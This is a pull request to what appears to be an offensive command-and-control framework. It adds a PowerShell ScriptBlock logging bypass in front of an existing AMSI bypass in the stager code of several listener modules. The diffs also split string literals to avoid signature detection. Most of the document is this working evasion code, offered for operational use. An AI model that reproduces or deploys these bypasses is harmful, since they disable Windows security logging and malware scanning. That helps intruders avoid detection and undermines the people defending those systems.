### PR TITLE
Bypass ScriptBlock Logging

### DIFF
--- a/lib/listeners/dbx.py
+++ b/lib/listeners/dbx.py
@@ -181,9 +181,9 @@ class Listener:
                     stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
                     stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
                     stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
                     stager += helpers.randomize_capitalization("$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
 
                     # @mattifestation's AMSI bypass
                     stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")

--- a/lib/listeners/dbx.py
+++ b/lib/listeners/dbx.py
@@ -175,8 +175,18 @@ class Listener:
 
                 stager = ''
                 if safeChecks.lower() == 'true':
+                    # ScriptBlock Logging bypass
+                    stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+                    stager += "'System.Management.Automation.Utils'"
+                    stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
+                    stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
+                    stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += helpers.randomize_capitalization("$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+
                     # @mattifestation's AMSI bypass
-                    stager = helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
                     stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"

--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -171,8 +171,18 @@ class Listener:
 
                 stager = ''
                 if safeChecks.lower() == 'true':
+                    # ScriptBlock Logging bypass
+                    stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+                    stager += "'System.Management.Automation.Utils'"
+                    stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
+                    stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
+                    stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += helpers.randomize_capitalization("$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+
                     # @mattifestation's AMSI bypass
-                    stager = helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
                     stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"

--- a/lib/listeners/http.py
+++ b/lib/listeners/http.py
@@ -177,9 +177,9 @@ class Listener:
                     stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
                     stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
                     stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
                     stager += helpers.randomize_capitalization("$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
 
                     # @mattifestation's AMSI bypass
                     stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")

--- a/lib/listeners/http_com.py
+++ b/lib/listeners/http_com.py
@@ -171,8 +171,18 @@ class Listener:
 
                 stager = ''
                 if safeChecks.lower() == 'true':
+                    # ScriptBlock Logging bypass
+                    stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+                    stager += "'System.Management.Automation.Utils'"
+                    stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
+                    stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
+                    stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += helpers.randomize_capitalization("$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+
                     # @mattifestation's AMSI bypass
-                    stager = helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
                     stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"

--- a/lib/listeners/http_com.py
+++ b/lib/listeners/http_com.py
@@ -177,9 +177,9 @@ class Listener:
                     stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
                     stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
                     stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
                     stager += helpers.randomize_capitalization("$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
 
                     # @mattifestation's AMSI bypass
                     stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")

--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@@ -147,8 +147,18 @@ class Listener:
 
                 stager = ''
                 if safeChecks.lower() == 'true':
+                    # ScriptBlock Logging bypass
+                    stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+                    stager += "'System.Management.Automation.Utils'"
+                    stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
+                    stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
+                    stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += helpers.randomize_capitalization("$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+
                     # @mattifestation's AMSI bypass
-                    stager = helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
                     stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"

--- a/lib/listeners/http_foreign.py
+++ b/lib/listeners/http_foreign.py
@@ -153,9 +153,9 @@ class Listener:
                     stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
                     stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
                     stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
                     stager += helpers.randomize_capitalization("$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
 
                     # @mattifestation's AMSI bypass
                     stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")

--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@@ -132,9 +132,9 @@ class Listener:
                     stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
                     stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
                     stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
                     stager += helpers.randomize_capitalization("$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
 
                     # @mattifestation's AMSI bypass
                     stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")

--- a/lib/listeners/http_hop.py
+++ b/lib/listeners/http_hop.py
@@ -126,8 +126,18 @@ class Listener:
 
                 stager = ''
                 if safeChecks.lower() == 'true':
+                    # ScriptBlock Logging bypass
+                    stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+                    stager += "'System.Management.Automation.Utils'"
+                    stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
+                    stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
+                    stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += helpers.randomize_capitalization("$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+
                     # @mattifestation's AMSI bypass
-                    stager = helpers.randomize_capitalization("[Ref].Assembly.GetType(")
+                    stager += helpers.randomize_capitalization("[Ref].Assembly.GetType(")
                     stager += "'System.Management.Automation.AmsiUtils'"
                     stager += helpers.randomize_capitalization(')|?{$_}|%{$_.GetField(')
                     stager += "'amsiInitFailed','NonPublic,Static'"

--- a/lib/listeners/http_mapi.py
+++ b/lib/listeners/http_mapi.py
@@ -174,8 +174,18 @@ class Listener:
 
                 stager = ''
                 if safeChecks.lower() == 'true':
+                    # ScriptBlock Logging bypass
+                    stager = helpers.randomize_capitalization("$GroupPolicySettings = [ref].Assembly.GetType(")
+                    stager += "'System.Management.Automation.Utils'"
+                    stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
+                    stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
+                    stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += helpers.randomize_capitalization("$GroupPolicySettings")
+                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+
                     # @mattifestation's AMSI bypass
-                    stager = helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
+                    stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')
                     stager += "$outlook = New-Object -comobject Outlook.Application;"
                     stager += helpers.randomize_capitalization('$mapi = $Outlook.GetNameSpace("')
                     stager += 'MAPI");'

--- a/lib/listeners/http_mapi.py
+++ b/lib/listeners/http_mapi.py
@@ -180,9 +180,9 @@ class Listener:
                     stager += helpers.randomize_capitalization(").\"GetFie`ld\"(")
                     stager += "'cachedGroupPolicySettings', 'N'+'onPublic,Static'"
                     stager += helpers.randomize_capitalization(").GetValue($null);$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptB'+'lockLogging'] = 0;"
                     stager += helpers.randomize_capitalization("$GroupPolicySettings")
-                    stager += "['ScriptBlockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
+                    stager += "['ScriptB'+'lockLogging']['EnableScriptBlockInvocationLogging'] = 0;"
 
                     # @mattifestation's AMSI bypass
                     stager += helpers.randomize_capitalization('Add-Type -assembly "Microsoft.Office.Interop.Outlook";')


### PR DESCRIPTION
This uses the ScriptBlock logging bypass described [here](https://cobbr.io/ScriptBlock-Logging-Bypass.html) and [shown in this gist](https://gist.github.com/cobbr/d8072d730b24fbae6ffe3aed8ca9c407) to avoid creating ScriptBlock logs. It's important to note that the bypass itself **is** logged (along with the rest of the stager until IEX is called).

Thought I'd submit a PR for this separately from the behemoth of a PR that my last one was, hopefully this one's a bit easier to manage!